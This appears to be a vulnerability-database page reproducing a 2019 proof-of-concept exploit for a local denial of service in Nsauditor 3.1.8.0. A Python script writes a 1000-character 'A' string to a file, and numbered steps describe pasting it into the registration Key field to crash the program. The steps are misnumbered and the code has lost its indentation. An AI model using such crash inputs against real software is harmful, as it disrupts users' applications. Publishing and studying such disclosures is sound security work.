Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NSAuditor 3.1.8.0 Key Denial Of Service

🗓️ 02 Dec 2019 00:00:00Reported by sajjadbndType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 164 Views

Nsauditor 3.1.8.0 Key Denial Of Service vulnerability in Nsauditor 3.1.8.0 allows attackers to crash the application by entering a specially crafted key

Code
`# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)  
# Discovery by: SajjadBnd  
# Date: 2019-11-30  
# Vendor Homepage: http://www.nsauditor.com  
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe  
# Tested Version: 3.1.8.0  
# Vulnerability Type: Denial of Service (DoS) Local  
# Tested on OS: Windows 10 - Pro  
# Email : [email protected]  
  
# About App  
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks   
# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise   
# network for all potential methods that a hacker might use to attack it and create a report of potential   
# problems that were found , Nsauditor network auditing software significantly reduces the total cost of   
# network management in enterprise environments by enabling IT personnel and systems administrators gather   
# a wide range of information from all the computers in the network without installing server-side applications   
# on these computers and create a report of potential problems that were found.  
  
# POC  
# 1.Run the python script, it will create a new file "dos.txt"  
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"  
# 2.Paste the content of dos.txt into the Field: 'Key'  
# 6.click 'ok'  
# 5.Crashed ;)  
  
#!/usr/bin/env python  
  
buffer = "\x41" * 1000  
try:  
f=open("dos.txt","w")  
print "[+] Creating %s bytes DOS payload.." %len(buffer)  
f.write(buffer)  
f.close()  
print "[+] File created!"  
except:  
print "File cannot be created"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Dec 2019 00:00Current
nsauditor 3.1.8.0key denial of servicevulnerability discoverysajjadbnd2019-11-30nsauditor network security auditornetwork security toolwindows 10doslocalexploitpython script
164